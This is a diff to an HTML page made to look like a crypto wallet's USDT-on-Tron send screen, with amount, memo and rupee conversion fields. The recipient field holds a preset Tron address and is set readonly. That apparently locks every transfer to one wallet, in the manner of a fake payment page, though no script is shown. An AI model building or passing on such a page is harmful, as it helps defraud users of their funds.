--- a/index.html
+++ b/index.html
@@ -3,54 +3,90 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>dApp</title>
+  <title>Tron</title>
   <link rel="stylesheet" href="style.css">
 </head>
 <body>
 
+
 <div class="container">
 
-  <label class="label">Address or Domain Name</label>
-  <div class="input-box">
-    <input type="text" value="TKDxyv1d1krLSfynn3jQrY">
-    <div class="icons">
-      <span class="text">Paste</span>
-      <span class="icon">
-        <svg viewBox="0 0 24 24"><path d="M12 12a5 5 0 1 0-5-5 5 5 0 0 0 5 5Zm0 2c-4.4 0-8 2.2-8 5v1h16v-1c0-2.8-3.6-5-8-5Z"/></svg>
-      </span>
-      <span class="icon">
-        <svg viewBox="0 0 24 24"><path d="M3 7V3h4M21 7V3h-4M3 17v4h4M21 17v4h-4" fill="none" stroke-width="2"/></svg>
-      </span>
+  <label>Address or Domain Name</label>
+  <div class="input-box" id="addressBox">
+    <input id="address" value="TKDxyv1d1krLSfynn3jQrYfbkLmR8SYy3p" readonly>
+    <div class="actions">
+      <span class="paste">Paste</span>
+      <svg viewBox="0 0 24 24">
+        <rect x="9" y="9" width="13" height="13" rx="2"></rect>
+        <path d="M5 15V5a2 2 0 0 1 2-2h10"></path>
+      </svg>
+      <svg viewBox="0 0 24 24">
+        <path d="M4 7V4h3"></path>
+        <path d="M17 4h3v3"></path>
+        <path d="M20 17v3h-3"></path>
+        <path d="M7 20H4v-3"></path>
+      </svg>
     </div>
   </div>
 
-  <label class="label">Amount</label>
-  <div class="input-box">
-    <input type="text" placeholder="Amount">
-    <div class="icons">
-      <span class="unit">USDT</span>
-      <span class="text">Max</span>
-    </div>
+  <label class="mt">Destination network</label>
+  <div class="pill">
+    <svg class="tron" viewBox="0 0 64 64">
+  <circle cx="32" cy="32" r="32" fill="#0B0E11"/>
+  <path fill="#F3BA2F" d="
+    M32 10
+    22 16 26 18 32 14 38 18 42 16
+    32 10
+
+    16 22
+    16 42 22 46 22 26
+    16 22
+
+    48 22
+    48 42 42 46 42 26
+    48 22
+
+    32 50
+    22 44 26 42 32 46 38 42 42 44
+    32 50
+
+    26 18
+    26 26 32 30 38 26 38 18
+    32 22
+    26 18
+
+    26 42
+    26 34 32 30 38 34 38 42
+    32 38
+    26 42
+  "/>
+</svg>
+    <span>Tron ▾</span>
   </div>
 
-  <div class="rate">= $</div>
-
-  <label class="label">Memo</label>
-  <div class="input-box">
-    <input type="text">
-    <div class="icons">
-      <span class="icon">
-        <svg viewBox="0 0 24 24"><path d="M3 7V3h4M21 7V3h-4M3 17v4h4M21 17v4h-4" fill="none" stroke-width="2"/></svg>
-      </span>
-      <span class="icon alert">
-        <svg viewBox="0 0 24 24"><path d="M12 2a10 10 0 1 0 10 10A10 10 0 0 0 12 2Zm0 6a1.2 1.2 0 1 1-1.2 1.2A1.2 1.2 0 0 1 12 8Zm1.5 9h-3v-2h1v-3h-1V10h3v5h1Z"/></svg>
-      </span>
-    </div>
+  <label class="mt">Amount</label>
+  <div class="input-box" id="amountBox">
+    <input id="amount" placeholder="USDT Amount" inputmode="decimal">
+    <span class="usdt">USDT</span>
+    <span class="max">Max</span>
   </div>
+  <div>
+    <label class="mt">Memo</label>
+    <div class="input-box">
+      <input id="memo">
+      <div class="actions">
+        <svg viewBox="0 0 24 24">
+          <path d="M19 11h-8a1 1 0 0 1-1-1v-3a1 1 0 0 1 1-1h3a1 1 0 0 1 1 1v1.5a1 1 0 0 1-1 1z"></path>
+          <path d="M19 19H5a2 2 0 0 1-2-2V7a2 2 0 0 1 2-2h11l5 5v11a2 2 0 0 1-2 2z"></path>
+        </svg>
+  </div>
+
+  <div class="price">≈ ₹<span id="inr">0.00</span></div>
 
 </div>
 
-<button class="next">Next</button>
+<button id="next">Next</button>
+
 
 </body>
 </html>
